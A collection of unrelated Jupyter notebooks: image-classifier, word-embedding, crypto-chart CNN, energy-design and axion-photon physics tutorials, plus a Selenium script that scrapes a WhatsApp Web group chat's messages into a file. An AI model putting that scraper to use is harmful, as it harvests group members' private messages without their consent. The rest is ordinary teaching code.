print("coefficient fractions:")
for i, k in enumerate(stats1.keys()):
print(k, f"{reg.coef_[i] / coef_sum:6.3f}")
print(
f"\naccuracy:\n{np.mean((reg.predict(tmp) < 0.5) ^ np.concatenate(list(targets.values()))):.3f}"
)
print(
f"accuracy 6: {np.mean((reg.predict(tmp[:targets[6].size]) < 0.5) ^ targets[6]):.3f}"
)
print(
f"accuracy 8: {np.mean((reg.predict(tmp[targets[6].size:targets[6].size + targets[8].size]) < 0.5) ^ targets[8]):.3f}"
)
print(
f"accuracy 10: {np.mean((reg.predict(tmp[-targets[10].size:]) < 0.5) ^ targets[10]):.3f}"
)
```
| github_jupyter |
```
import selenium
from selenium import webdriver
from selenium.webdriver.common import keys
from time import sleep
import os
os.environ['PATH'] += ':.'
os.environ['DISPLAY'] = ':0'
options = webdriver.ChromeOptions()
for i in ('--disable-extensions', '--disable-dev-shm-usage', "--no-sandbox", "user-data-dir=/tmp/"
):
options.add_argument(i)
driver = webdriver.Chrome(options=options, executable_path='./chromedriver')
driver.get('http://web.whatsapp.com')
# signed_in = driver.find_elements_by_xpath("//*[contains(text(), 'Keep me')]")[0]
# signed_in.click()
print("CONFIRME O QR CODE E DEPOIS CLIQUE NO CHAT DO GRUPO QUE QUER CRAWLEAR!")
sleep(1)
def get_chat_area():
body = driver.find_element_by_tag_name('body')
chat_area_father = body.find_element_by_class_name('copyable-area')
chat_area = chat_area_father.find_element_by_xpath('div[1]') # get 1st div child
chat_area.get_attribute('class')
return chat_area, body
chat_area, body = get_chat_area()
chat_area
messages = driver.find_elements_by_class_name('message-in')
len(messages)
def sleep_until_messages_loaded(body):
for i in range(10):
try: body.find_element_by_xpath('//div[contains(@title, "loading messages")]')
except selenium.common.exceptions.NoSuchElementException: return True
sleep(0.5)
return False
els = [] # RENAME ELS
sleep_until_messages_loaded(body)
driver.execute_script('''
function _x(STR_XPATH) {
var xresult = document.evaluate(STR_XPATH, document, null, XPathResult.ANY_TYPE, null);
var xnodes = [];
var xres;
while (xres = xresult.iterateNext()) {
xnodes.push(xres);
}
return xnodes;
}
window._x = _x;
''')
xpath = '//div[contains(@class, "message-in")]|//div[contains(@class, "message-out")]'
driver.execute_script(f'''
return _.map(_x('{xpath}'), x => x)
''')
def get_msgs():
removed_els = driver.execute_script('''
return _.map(_x('%s').slice(5,100000)
,x => {
if(x) {a = x.outerHTML; x.remove(); return a} else {return null}
})
''' % xpath)
removed_els.reverse()
return removed_els
get_msgs()
### RENAME FUNCTION
chat_area, _ = get_chat_area()
chat_area.click() # TRY TO CLICK IN an area withou conflict
for i in range(150):
els += get_msgs()
[body.send_keys(keys.Keys.PAGE_UP) for _ in range(5)]
sleep(0.5)
sleep_until_messages_loaded(body)
print(i, flush=True, end=',')
#if (i % 10) == 0: chat_area.click(), print()
print('\n Length');
print(len(els))
import copy
import settings
FILENAME = settings.GROUP_NAME + '.html'
r_els = copy.copy(els)
r_els.reverse()
with open(FILENAME, 'w+') as f:
f.writelines(r_els)
print(f'{FILENAME} written!')
```
## Extras
```
############## Extras ##############
import base64
def get_blob_content(driver, uri) -> bytes:
"""
Use to grab files such as images from blob links
get_blob_content("blob:https://web.whatsapp.com/cf8679c6-e3cb-4a30-91ed-3a67de1d5dd4")
"""
result = driver.execute_async_script("""
var uri = arguments[0];
var callback = arguments[1];
var toBase64 = function(buffer){for(var r,n=new Uint8Array(buffer),t=n.length,a=new Uint8Array(4*Math.ceil(t/3)),i=new Uint8Array(64),o=0,c=0;64>c;++c)i[c]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".charCodeAt(c);for(c=0;t-t%3>c;c+=3,o+=4)r=n[c]<<16|n[c+1]<<8|n[c+2],a[o]=i[r>>18],a[o+1]=i[r>>12&63],a[o+2]=i[r>>6&63],a[o+3]=i[63&r];return t%3===1?(r=n[t-1],a[o]=i[r>>2],a[o+1]=i[r<<4&63],a[o+2]=61,a[o+3]=61):t%3===2&&(r=(n[t-2]<<8)+n[t-1],a[o]=i[r>>10],a[o+1]=i[r>>4&63],a[o+2]=i[r<<2&63],a[o+3]=61),new TextDecoder("ascii").decode(a)};
var xhr = new XMLHttpRequest();
xhr.responseType = 'arraybuffer';
xhr.onload = function(){ callback(toBase64(xhr.response)) };
xhr.onerror = function(){ callback(xhr.status) };
xhr.open('GET', uri);
xhr.send();
""", uri)
if type(result) == int :
raise Exception("Request failed with status %s" % result)
return base64.b64decode(result)
def bind(instance, func, asname):
setattr(instance, asname, func.__get__(instance, instance.__class__))
def bind_driver(driver):
bind(driver, get_blob_content, 'get_blob_content')
def display_image(bytes):
from IPython.display import Image
with open('/tmp/a.jpg', 'wb') as f: f.write(bytes)
Image('/tmp/a.jpg')
```
| github_jupyter |
```
!wget --no-check-certificate \
https://storage.googleapis.com/laurencemoroney-blog.appspot.com/horse-or-human.zip \
-O /tmp/horse-or-human.zip
```
The following python code will use the OS library to use Operating System libraries, giving you access to the file system, and the zipfile library allowing you to unzip the data.
```
import os
import zipfile
local_zip = '/tmp/horse-or-human.zip'
zip_ref = zipfile.ZipFile(local_zip, 'r')
zip_ref.extractall('/tmp/horse-or-human')
zip_ref.close()
```
The contents of the .zip are extracted to the base directory `/tmp/horse-or-human`, which in turn each contain `horses` and `humans` subdirectories.
In short: The training set is the data that is used to tell the neural network model that 'this is what a horse looks like', 'this is what a human looks like' etc.
One thing to pay attention to in this sample: We do not explicitly label the images as horses or humans. If you remember with the handwriting example earlier, we had labelled 'this is a 1', 'this is a 7' etc. Later you'll see something called an ImageGenerator being used -- and this is coded to read images from subdirectories, and automatically label them from the name of that subdirectory. So, for example, you will have a 'training' directory containing a 'horses' directory and a 'humans' one. ImageGenerator will label the images appropriately for you, reducing a coding step.
Let's define each of these directories:
```
# Directory with our training horse pictures
train_horse_dir = os.path.join('/tmp/horse-or-human/horses')
# Directory with our training human pictures
train_human_dir = os.path.join('/tmp/horse-or-human/humans')
```
Now, let's see what the filenames look like in the `horses` and `humans` training directories:
```
train_horse_names = os.listdir(train_horse_dir)
print(train_horse_names[:10])
train_human_names = os.listdir(train_human_dir)
print(train_human_names[:10])
```
Let's find out the total number of horse and human images in the directories:
```
print('total training horse images:', len(os.listdir(train_horse_dir)))
print('total training human images:', len(os.listdir(train_human_dir)))
```
Now let's take a look at a few pictures to get a better sense of what they look like. First, configure the matplot parameters:
```
%matplotlib inline
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
# Parameters for our graph; we'll output images in a 4x4 configuration
nrows = 4
ncols = 4
# Index for iterating over images
pic_index = 0
```
Now, display a batch of 8 horse and 8 human pictures. You can rerun the cell to see a fresh batch each time:
```
# Set up matplotlib fig, and size it to fit 4x4 pics
fig = plt.gcf()
fig.set_size_inches(ncols * 4, nrows * 4)
pic_index += 8
next_horse_pix = [os.path.join(train_horse_dir, fname)
for fname in train_horse_names[pic_index-8:pic_index]]
next_human_pix = [os.path.join(train_human_dir, fname)
for fname in train_human_names[pic_index-8:pic_index]]
for i, img_path in enumerate(next_horse_pix+next_human_pix):
# Set up subplot; subplot indices start at 1
sp = plt.subplot(nrows, ncols, i + 1)
sp.axis('Off') # Don't show axes (or gridlines)
img = mpimg.imread(img_path)
plt.imshow(img)
plt.show()
```
## Building a Small Model from Scratch
But before we continue, let's start defining the model:
Step 1 will be to import tensorflow.
```
import tensorflow as tf
```
We then add convolutional layers as in the previous example, and flatten the final result to feed into the densely connected layers.
Finally we add the densely connected layers.
Note that because we are facing a two-class classification problem, i.e. a *binary classification problem*, we will end our network with a [*sigmoid* activation](https://wikipedia.org/wiki/Sigmoid_function), so that the output of our network will be a single scalar between 0 and 1, encoding the probability that the current image is class 1 (as opposed to class 0).
```
model = tf.keras.models.Sequential([
# Note the input shape is the desired size of the image 300x300 with 3 bytes color
# This is the first convolution
tf.keras.layers.Conv2D(16, (3,3), activation='relu', input_shape=(300, 300, 3)),
tf.keras.layers.MaxPooling2D(2, 2),
# The second convolution
tf.keras.layers.Conv2D(32, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The third convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fourth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# The fifth convolution
tf.keras.layers.Conv2D(64, (3,3), activation='relu'),
tf.keras.layers.MaxPooling2D(2,2),
# Flatten the results to feed into a DNN
tf.keras.layers.Flatten(),
# 512 neuron hidden layer
tf.keras.layers.Dense(512, activation='relu'),
# Only 1 output neuron. It will contain a value from 0-1 where 0 for 1 class ('horses') and 1 for the other ('humans')
tf.keras.layers.Dense(1, activation='sigmoid')
])
```
The model.summary() method call prints a summary of the NN
```
model.summary()
```
The "output shape" column shows how the size of your feature map evolves in each successive layer. The convolution layers reduce the size of the feature maps by a bit due to padding, and each pooling layer halves the dimensions.
Next, we'll configure the specifications for model training. We will train our model with the `binary_crossentropy` loss, because it's a binary classification problem and our final activation is a sigmoid. (For a refresher on loss metrics, see the [Machine Learning Crash Course](https://developers.google.com/machine-learning/crash-course/descending-into-ml/video-lecture).) We will use the `rmsprop` optimizer with a learning rate of `0.001`. During training, we will want to monitor classification accuracy.
**NOTE**: In this case, using the [RMSprop optimization algorithm](https://wikipedia.org/wiki/Stochastic_gradient_descent#RMSProp) is preferable to [stochastic gradient descent](https://developers.google.com/machine-learning/glossary/#SGD) (SGD), because RMSprop automates learning-rate tuning for us. (Other optimizers, such as [Adam](https://wikipedia.org/wiki/Stochastic_gradient_descent#Adam) and [Adagrad](https://developers.google.com/machine-learning/glossary/#AdaGrad), also automatically adapt the learning rate during training, and would work equally well here.)
```
from tensorflow.keras.optimizers import RMSprop
model.compile(loss='binary_crossentropy',
optimizer=RMSprop(lr=0.001),
metrics=['acc'])
```
### Data Preprocessing
Let's set up data generators that will read pictures in our source folders, convert them to `float32` tensors, and feed them (with their labels) to our network. We'll have one generator for the training images and one for the validation images. Our generators will yield batches of images of size 300x300 and their labels (binary).
As you may already know, data that goes into neural networks should usually be normalized in some way to make it more amenable to processing by the network. (It is uncommon to feed raw pixels into a convnet.) In our case, we will preprocess our images by normalizing the pixel values to be in the `[0, 1]` range (originally all values are in the `[0, 255]` range).
In Keras this can be done via the `keras.preprocessing.image.ImageDataGenerator` class using the `rescale` parameter. This `ImageDataGenerator` class allows you to instantiate generators of augmented image batches (and their labels) via `.flow(data, labels)` or `.flow_from_directory(directory)`. These generators can then be used with the Keras model methods that accept data generators as inputs: `fit_generator`, `evaluate_generator`, and `predict_generator`.
```
from tensorflow.keras.preprocessing.image import ImageDataGenerator
# All images will be rescaled by 1./255
train_datagen = ImageDataGenerator(rescale=1/255)
# Flow training images in batches of 128 using train_datagen generator
train_generator = train_datagen.flow_from_directory(
'/tmp/horse-or-human/', # This is the source directory for training images
target_size=(300, 300), # All images will be resized to 150x150
batch_size=128,
# Since we use binary_crossentropy loss, we need binary labels
class_mode='binary')
```
### Training
Let's train for 15 epochs -- this may take a few minutes to run.
Do note the values per epoch.
The Loss and Accuracy are a great indication of progress of training. It's making a guess as to the classification of the training data, and then measuring it against the known label, calculating the result. Accuracy is the portion of correct guesses.
```
history = model.fit_generator(
train_generator,
steps_per_epoch=8,
epochs=15,
verbose=1)
```
###Running the Model
Let's now take a look at actually running a prediction using the model. This code will allow you to choose 1 or more files from your file system, it will then upload them, and run them through the model, giving an indication of whether the object is a horse or a human.
```
import numpy as np
from google.colab import files
from keras.preprocessing import image
uploaded = files.upload()
for fn in uploaded.keys():
# predicting images
path = '/content/' + fn
img = image.load_img(path, target_size=(300, 300))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
images = np.vstack([x])
classes = model.predict(images, batch_size=10)
print(classes[0])
if classes[0]>0.5:
print(fn + " is a human")
else:
print(fn + " is a horse")
```
### Visualizing Intermediate Representations
To get a feel for what kind of features our convnet has learned, one fun thing to do is to visualize how an input gets transformed as it goes through the convnet.
Let's pick a random image from the training set, and then generate a figure where each row is the output of a layer, and each image in the row is a specific filter in that output feature map. Rerun this cell to generate intermediate representations for a variety of training images.
```
import numpy as np
import random
from tensorflow.keras.preprocessing.image import img_to_array, load_img
# Let's define a new Model that will take an image as input, and will output
# intermediate representations for all layers in the previous model after
# the first.
successive_outputs = [layer.output for layer in model.layers[1:]]
#visualization_model = Model(img_input, successive_outputs)
visualization_model = tf.keras.models.Model(inputs = model.input, outputs = successive_outputs)
# Let's prepare a random input image from the training set.
horse_img_files = [os.path.join(train_horse_dir, f) for f in train_horse_names]
human_img_files = [os.path.join(train_human_dir, f) for f in train_human_names]
img_path = random.choice(horse_img_files + human_img_files)
img = load_img(img_path, target_size=(300, 300)) # this is a PIL image
x = img_to_array(img) # Numpy array with shape (150, 150, 3)
x = x.reshape((1,) + x.shape) # Numpy array with shape (1, 150, 150, 3)
# Rescale by 1/255
x /= 255
# Let's run our image through our network, thus obtaining all
# intermediate representations for this image.
successive_feature_maps = visualization_model.predict(x)
# These are the names of the layers, so can have them as part of our plot
layer_names = [layer.name for layer in model.layers]
# Now let's display our representations
for layer_name, feature_map in zip(layer_names, successive_feature_maps):
if len(feature_map.shape) == 4:
# Just do this for the conv / maxpool layers, not the fully-connected layers
n_features = feature_map.shape[-1] # number of features in feature map
# The feature map has shape (1, size, size, n_features)
size = feature_map.shape[1]
# We will tile our images in this matrix
display_grid = np.zeros((size, size * n_features))
for i in range(n_features):
# Postprocess the feature to make it visually palatable
x = feature_map[0, :, :, i]
x -= x.mean()
x /= x.std()
x *= 64
x += 128
x = np.clip(x, 0, 255).astype('uint8')
# We'll tile each filter into this big horizontal grid
display_grid[:, i * size : (i + 1) * size] = x
# Display the grid
scale = 20. / n_features
plt.figure(figsize=(scale * n_features, scale))
plt.title(layer_name)
plt.grid(False)
plt.imshow(display_grid, aspect='auto', cmap='viridis')
```
As you can see we go from the raw pixels of the images to increasingly abstract and compact representations. The representations downstream start highlighting what the network pays attention to, and they show fewer and fewer features being "activated"; most are set to zero. This is called "sparsity." Representation sparsity is a key feature of deep learning.
These representations carry increasingly less information about the original pixels of the image, but increasingly refined information about the class of the image. You can think of a convnet (or a deep network in general) as an information distillation pipeline.
## Clean Up
Before running the next exercise, run the following cell to terminate the kernel and free memory resources:
```
import os, signal
os.kill(os.getpid(), signal.SIGKILL)
```
| github_jupyter |
```
import sys
import numpy as np
np.random.seed(42)
import keras.backend as K
from keras.models import Sequential
from keras.layers import Dense, Embedding, Lambda
from keras.utils import np_utils
from keras.preprocessing import sequence
from keras.preprocessing.text import Tokenizer
from keras.initializers import Constant
import pandas as pd
import gensim
# In case your sys.path does not contain the base repo, cd there.
print(sys.path)
%cd '~/ml-solr-course'
path = 'dataset/docv2_train_queries.tsv'
queries = pd.read_csv(path, sep='\t', lineterminator='\r', names=['query_id', 'query'])[:20000]
queries.head()
corpus = [sentence for sentence in queries['query'].values if type(sentence) == str and len(sentence.split(' ')) >= 3]
# We load the pretrained embedding
path_to_glove_file = "./dataset/glove.6B.100d.txt"
embeddings_index = {}
with open(path_to_glove_file) as f:
for line in f:
word, coefs = line.split(maxsplit=1)
coefs = np.fromstring(coefs, "f", sep=" ")
embeddings_index[word] = coefs
print("Found %s word vectors." % len(embeddings_index))
tokenizer = Tokenizer()
tokenizer.fit_on_texts(corpus)
corpus = tokenizer.texts_to_sequences(corpus)
nb_samples = sum(len(s) for s in corpus)
V = len(tokenizer.word_index) + 1
dim = 100
window_size = 3
epochs=50
batch_size = 5000
BATCH = False
print(f'First 5 corpus items are {corpus[:5]}')
print(f'Length of corpus is {len(corpus)}')
```
Now comes the interesting part, we need to construct a matrix of `V+1 x dim` and for each word in the tokenizer, try to get it from the embedding. If it doesn't exist then just fill it with zeros.
```
num_tokens = V + 1
hits = 0
misses = 0
# Prepare embedding matrix
embedding_matrix = None
for word, i in tokenizer.word_index.items():
embedding_vector = None # Get the embedding vector from the GloVe embedding
if embedding_vector is not None:
# Words not found in embedding index will be all-zeros.
# This includes the representation for "padding" and "OOV"
embedding_matrix[i] = embedding_vector
hits += 1
else:
misses += 1
print("Converted %d words (%d misses)" % (hits, misses))
```
cbow = Sequential()
cbow.add() # Add the same Embedding as before, but the embeddings initializer will be the embedding matrix we have built, and trainable to False. This way we start from the pretrained embedding.
cbow.add(Lambda(lambda x: K.mean(x, axis=1), output_shape=(dim,)))
cbow.add(Dense(V, activation='softmax'))
```
cbow.compile(loss='categorical_crossentropy', optimizer='adam')
cbow.summary()
```
Notice the Non-trainable parameters! What we are doing is just training the softmax based on correct embeddings. This is called fine tuning the embedding.
```
def generate_data(corpus, window_size, V, batch_size=batch_size):
number_of_batches = (len(corpus) // batch_size) + 1
for batch in range(number_of_batches):
lower_end = batch*batch_size
upper_end = (batch+1)*batch_size if batch+1 < number_of_batches else len(corpus)
mini_batch_size = upper_end - lower_end
maxlen = window_size*2
X = np.zeros((mini_batch_size, maxlen))
Y = np.zeros((mini_batch_size, V))
for query_id, words in enumerate(corpus[lower_end:upper_end]):
L = len(words)
for index, word in enumerate(words):
contexts = []
labels = []
s = index - window_size
e = index + window_size + 1
contexts.append([words[i] for i in range(s, e) if 0 <= i < L and i != index])
labels.append(word)
x = sequence.pad_sequences(contexts, maxlen=maxlen)
y = np_utils.to_categorical(labels, V)
X[query_id] = x
Y[query_id] = y
yield (X, Y)
# If data is small, you can just generate the whole dataset and load it in memory to use the fit method
#
if not BATCH:
def generate_data(corpus, window_size, V):
maxlen = window_size*2
X = np.zeros((len(corpus), maxlen))
Y = np.zeros((len(corpus), V))
for query_id, words in enumerate(corpus):
L = len(words)
for index, word in enumerate(words):
contexts = []
labels = []
s = index - window_size
e = index + window_size + 1
contexts.append([words[i] for i in range(s, e) if 0 <= i < L and i != index])
labels.append(word)
x = sequence.pad_sequences(contexts, maxlen=maxlen)
y = np_utils.to_categorical(labels, V)
X[query_id] = x
Y[query_id] = y
return (X, Y)
def fit_model():
if not BATCH:
X, Y = generate_data(corpus, window_size, V)
print(f'Size of X is {X.shape} and Y is {Y.shape}')
cbow.fit(X, Y, epochs = epochs)
else:
index = 1
for x, y in generate_data(corpus, window_size, V):
print(f'Training on Iteration: {index}')
index += 1
history = cbow.train_on_batch(x, y, reset_metrics=False, return_dict=True)
print(history)
fit_model()
with open('./1-synonyms/lab2/vectors.txt' ,'w') as f:
f.write('{} {}\n'.format(V-1, dim))
vectors = cbow.get_weights()[0]
for word, i in tokenizer.word_index.items():
str_vec = ' '.join(map(str, list(vectors[i, :])))
f.write('{} {}\n'.format(word, str_vec))
w2v = gensim.models.KeyedVectors.load_word2vec_format('./1-synonyms/lab2/vectors.txt', binary=False)
w2v.most_similar(positive=['gasoline'])
w2v.most_similar(positive=['grape'])
```
Do you notice the difference in the accuracy? For any task first search if there are any pretrained models to use!
| github_jupyter |
# Functional Design:
### 1. Predict the availability of solar and wind energy at various time and location in the future.
#### 1.1. Input a specific time and location.
** Component Design: **
1. function name: get_location_and_time()
2. take the input: DD/MM/YY, zipcode
3. if the input is wrong, output a error message
#### 1.2. Find or predict the available solar and wind energy.
** Component Design: **
1. function name: predict_energy()
2. take the information of time and location
3. download the data of insolation and wind speed/direction
4. calculate or predict the generation of solar and wind energy
5. output the information of available solar and wind energy
### 2. Assess the time-and-space-dependent balance between energy consumption and generation.
#### 2.1. Input a specific time and location.
** Component Design: **
1. function name: get_location_and_time()
2. take the input: DD/MM/YY, zipcode
3. if the input is wrong, output a error message
#### 2.2. Find or predict the energy consumption.
** Component Design: **
1. function name: energy_consumption()
2. take the information of time and location
3. download the data of energy consumption.
4. predict the energy consumption in the future.
#### 2.3. Find the balance between the energy consumption and the generation of solar and wind energy.
#### And find the balance between future energy consumption and future generation of solar and wind energy.
** Component Design: **
1. function name: energy_balance()
2. take the information energy consumption from 2.2.
3. take the information energy generation from 1.2.
4. output the energy balance.
### 3. Evaluate the cost and pollution according to the energy balance
#### 3.1. Evaluate the cost.
** Component Design: **
1. function name: cost_evaluation()
2. take the input: energy balacne, cost of all kinds of energy sources)
3. output the total cost
#### 3.2. Evaluate the pollution.
** Component Design: **
1. function name: pollution_evaluation()
2. take the input: energy balacne, pollution caused by all kinds of energy sources)
3. output the total pollution
### 4. Rank the cities according to the total cost and polution, respectively.
#### 4.1. Collect the energy balance information of the cities.
** Component Design: **
1. function name: energy_balance_list()
2. creat a list of cities
2. take the information energy consumption from 2.2. for each city
3. take the information energy generation from 1.2. for each city
4. find and output the balance between the above two for each city
5. creat and output a list of the energy balance of cities.
#### 4.2. Collect the energy generation cost of the cities.
1. function name: cost_evaluation_list()
2. take the energy balance list from 4.1.
3. calcualte the energy generation cost for cities with 3.1.
4. creat and output a list of energy generation cost of cities
5. rank the cities according to the energy generation cost
#### 4.3. Collect the pollution caused by energy sources at the cities.
1. function name: pollution_evaluation_list()
2. take the energy balance list from 4.1.
3. calcualte the pollution caused by energy sources at the cities with 3.2.
4. creat and output a list of pollution caused by energy sources at the cities
5. rank the cities according to the pollution caused by energy sources at the cities

| github_jupyter |
#### Setup Notebook
```
from IPython.core.display import display, HTML
display(HTML("<style>.container { width:80% !important; }</style>"))
# Put these at the top of every notebook, to get automatic reloading and inline plotting
%reload_ext autoreload
%autoreload 2
%matplotlib inline
```
# Predicting Price Movements of Cryptocurrencies - Using Convolutional Neural Networks to Classify 2D Images of Chart Data
```
# This file contains all the main external libs we'll use
from fastai.imports import *
from fastai.transforms import *
from fastai.conv_learner import *
from fastai.model import *
from fastai.dataset import *
from fastai.sgdr import *
from fastai.plots import *
# For downloading files
from IPython.display import FileLink, FileLinks
# For confusion matrix
from sklearn.metrics import confusion_matrix
PATH = 'data/btc/btcgraphs_cropped/'
!ls {PATH}
os.listdir(f'{PATH}train')
files = os.listdir(f'{PATH}train/DOWN')[:5]
files
img = plt.imread(f'{PATH}train/DOWN/{files[3]}')
print(f'{PATH}train/DOWN/{files[0]}')
print(f'{PATH}train/DOWN/{files[1]}')
plt.imshow(img)
FileLink(f'{PATH}train/DOWN/{files[3]}')
```
# The Steps to Follow
1. Enable data augmentation, and precompute=True
1. Use `lr_find()` to find highest learning rate where loss is still clearly improving
1. Train last layer from precomputed activations for 1-2 epochs
1. Train last layer with data augmentation (i.e. precompute=False) for 2-3 epochs with cycle_len=1
1. Unfreeze all layers
1. Set earlier layers to 3x-10x lower learning rate than next higher layer
1. Use `lr_find()` again
1. Train full network with cycle_mult=2 until over-fitting
## 0. Setup
```
arch = resnet34
sz = 480
batch_size = int(64)
```
## 1. Data Augmentation
**Not using data augmentation this time**
Starting without useing data augmentation because I don't think it makes sense for these graphs, we don't need to generalize to slightly different angles. All plots will always be straight on and square in the frame.
```
tfms = tfms_from_model(arch, sz)
data = ImageClassifierData.from_paths(PATH, bs=batch_size, tfms=tfms,
trn_name='train', val_name='valid')#, test_name='test')
```
## 2. Choose a Learning Rate
```
learn = ConvLearner.pretrained(arch, data, precompute=True)
learn.save('00_pretrained_480')
# learn.precompute = True
learn.load('00_pretrained_480')
lrf = learn.lr_find()
learn.sched.plot_lr()
learn.sched.plot()
learn.save('01_lr_found_480')
```
## 3. Train Last Layer
```
# learn.precompute = True
learn.load('01_lr_found_480')
learn.fit(1e-4, 1, cycle_save_name='01_weights')
learn.save("02_trained_once_480")
```
#### Accuracy
TODO
Do some tests on accuracy of training on single epoch
## 4. Train Last Layer with Data Augmentation
**Not actually using any augmentation, this is just a few more rounds of training**
```
# learn.precompute = True
learn.load("02_trained_once_480")
learn.precompute=False #I don't think this makes a difference without data augmentation
learn.fit(1e-4, 3, cycle_len=1, best_save_name="02_best_model", cycle_save_name='02_weights')
learn.save("03_trained_2x_480")
learn.load("trained_2_market_movement")
```
More accuracy test...
```
learn.unfreeze()
```
Using a relatively large learning rate to train the prvious layers because this data set is not very similar to ImageNet
```
lr = np.array([0.0001/9, 0.0001/3, 0.00001])
learn.fit(lr, 3, cycle_len=1, cycle_mult=2, \
best_save_name="03_best_model", cycle_save_name='03_weights')
learn.save("trained_3_market_movement")
learn.load("trained_3_market_movement")
```
# Look at Results
```
data.val_y
data.classes
# this gives prediction for validation set. Predictions are in log scale
log_preds = learn.predict()
log_preds.shape
log_preds[:10]
preds = np.argmax(log_preds, axis=1) # from log probabilities to 0 or 1
probs = np.exp(log_preds[:,1]) # pr(dog)
probs
probs[1]
def rand_by_mask(mask):
return np.random.choice(np.where(mask)[0], 4, replace=False)
def rand_by_correct(is_correct):
return rand_by_mask((preds == data.val_y)==is_correct)
def plot_val_with_title(idxs, title):
imgs = np.stack([data.val_ds[x][0] for x in idxs])
title_probs = [probs[x] for x in idxs]
print(title)
return plots(data.val_ds.denorm(imgs), rows=1, titles=title_probs)
def plots(ims, figsize=(12,6), rows=1, titles=None):
f = plt.figure(figsize=figsize)
for i in range(len(ims)):
sp = f.add_subplot(rows, len(ims)//rows, i+1)
sp.axis('Off')
if titles is not None: sp.set_title(titles[i], fontsize=16)
plt.imshow(ims[i])
def load_img_id(ds, idx):
return np.array(PIL.Image.open(PATH+ds.fnames[idx]))
def plot_val_with_title(idxs, title):
imgs = [load_img_id(data.val_ds,x) for x in idxs]
title_probs = [probs[x] for x in idxs]
print(title)
return plots(imgs, rows=1, titles=title_probs, figsize=(16,8))
plot_val_with_title(rand_by_correct(True), "Correctly classified")
def most_by_mask(mask, mult):
idxs = np.where(mask)[0]
return idxs[np.argsort(mult * probs[idxs])[:4]]
def most_by_correct(y, is_correct):
mult = -1 if (y==1)==is_correct else 1
return most_by_mask(((preds == data.val_y)==is_correct) & (data.val_y == y), mult)
plot_val_with_title(most_by_correct(0, True), "Most correct DOWN")
plot_val_with_title(most_by_correct(1, True), "Most correct UP")
plot_val_with_title(most_by_correct(0, False), "Most incorrect DOWN")
```
# Analyze Results
```
data.val_y
log_preds = learn.predict()
preds = np.argmax(log_preds, axis=1) # from log probabilities to 0 or 1
probs = np.exp(log_preds[:,1]) # pr(dog)
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(data.val_y, preds)
plot_confusion_matrix(cm, data.classes)
cm
(cm[0][0]+cm[1][1])/(np.sum(cm))
np.sum(cm)-(42313)
```
| github_jupyter |
# Photon-photon dispersion
This tutorial shows how to include photon-photon dispersion off of background photon fields in the ALP-photon propagation calculation. The relevance of photon dispersion for ALP calculations is discussed in [Dobrynina 2015](https://journals.aps.org/prd/abstract/10.1103/PhysRevD.91.083003). A background field adds to the dispersive part of the refractive index of the propagation medium $n = 1+\chi$. [Dobrynina 2015](https://journals.aps.org/prd/abstract/10.1103/PhysRevD.91.083003) show that at $z=0$, $\chi_{CMB} = 5.11\times10^{-43}$. Dispersion off the CMB is included by default, but other values of $\chi$ can be included manually.
First import what we will need:
```
from gammaALPs.core import Source, ALP, ModuleList
from gammaALPs.base import environs, transfer
import numpy as np
import matplotlib.pyplot as plt
from astropy import constants as c
from matplotlib.patheffects import withStroke
from astropy import units as u
import time
from scipy.interpolate import RectBivariateSpline as RBSpline
effect = dict(path_effects=[withStroke(foreground="w", linewidth=2)]) # used for plotting
```
$\chi$ is included in the code as a 2D spline function in energy and propagation distance. This means that the points at which $\chi$ is calculated at do not need to be exactly the same as the points used for the magnetic field. It is also possible to include $\chi$ as an array of size `(1)` if you want a constant value, or size `(len(EGeV),len(r))`, if you have calculated $\chi$ in the exact magnetic field domains you will be using.
## $\chi$ function
We will create a fake $\chi$ function which changes with distance and energy, and then see its effects on mixing in different environments.
```
EGeV = np.logspace(-5.,6.,1000)
chiCMB = transfer.chiCMB
chiCMB
```
$r$ will be in pc for the jets and kpc for the clusters and GMF.
```
rs = np.logspace(-2,5,200)
chis = 1.e9 * rs[np.newaxis,:]**-3 * chiCMB * EGeV[:,np.newaxis]**(1.5) + chiCMB
plt.loglog(rs,chis[0,:])
plt.loglog(rs,chis[500,:])
plt.loglog(rs,chis[-1,:])
plt.ylabel(r'$\chi$')
plt.xlabel('r [pc or kpc] or z')
```
Our $\chi$ changes with both energy and distance.
```
ee, rr = np.meshgrid(EGeV,rs,indexing='ij')
plt.pcolormesh(ee,rr,np.log10(chis),cmap=plt.get_cmap('coolwarm'),
shading='auto')
plt.colorbar(label=r"log($\chi$)")
plt.xscale('log')
plt.yscale('log')
plt.xlabel('E [GeV]')
plt.ylabel('r [pc or kpc]')
```
Make the spline function:
```
chispl = RBSpline(EGeV,rs,chis,kx=1,ky=1,s=0)
```
Now we can test it for a source. We will use 3C454.3 (see the individual environment tutorials for more details on each of the environments).
```
src = Source(z=0.859 , ra='22h53m57.7s', dec='+16d08m54s', bLorentz=60.) # 3C454.3
pin = np.diag((1.,1.,0.)) * 0.5
```
## Jet
First, let's test the `"Jet"` class:
```
ml = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
ml_chi = ModuleList(ALP(m=1., g=2.), src, pin=pin, EGeV=EGeV, seed = 0)
# other jet
gamma_min = 18.
```
Add the same jet module to each, including $\chi$ with the `chi` keyword for the second one.
```
ml.add_propagation("Jet",
0, # position of module counted from the source.
B0=0.32, # Jet field at r = R0 in G
r0=1., # distance from BH where B = B0 in pc
rgam=3.19e17 * u.cm.to('pc'), # distance of gamma-ray emitting region to BH
alpha=-1., # exponent of toroidal mangetic field (default: -1.)
psi=np.pi/4., # Angle between one photon polarization state and B field.
# Assumed constant over entire jet.
helical=True, # if True, use helical magnetic-field model from Clausen-Brown et al. (2011).
# In this case, the psi kwarg is treated is as the phi angle
# of the photon trajectory in the cylindrical jet coordinate system
equipartition=True, # if true, assume equipartition between electrons and the B field.
# This will overwrite the exponent of electron density beta = 2 * alpha
# and set n0 given the minimum electron lorentz factor set with gamma_min
gamma_min=gamma_min, # minimum lorentz factor of emitting electrons, only used if equipartition=True
